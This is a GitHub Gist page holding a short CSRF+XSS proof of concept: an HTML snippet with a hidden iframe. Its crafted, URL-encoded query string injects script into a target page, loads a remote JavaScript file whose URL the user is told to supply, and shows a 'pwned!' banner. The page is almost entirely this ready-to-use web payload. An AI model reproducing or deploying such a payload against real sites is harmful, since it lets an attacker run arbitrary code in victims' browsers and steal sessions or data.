Skip to content

Instantly share code, notes, and snippets.

What would you like to do? CSRF+XSS / proof of concept
<title> PoC</title>
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "".
<iframe src=";svr=303&amp;lang=en_us%22%7D%0Aalert(1)%7D%20%7Bvar jsElm = document.createElement(&quot;script&quot;)%7D{jsElm.type = &quot;application/javascript&quot;}{jsElm.src = &quot;[jsfile]&quot;}{document.body.appendChild(jsElm)}%20function%20meow()%20%7Bif(true)%7B%7D%7D//%3C/script%3E%3Ccenter%3E%3Ch1%3Epwned!%3C/h1%3E%3C/center%3E%0A//&amp;aid=38787&amp;cid=14921140" style="display:none"></iframe>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.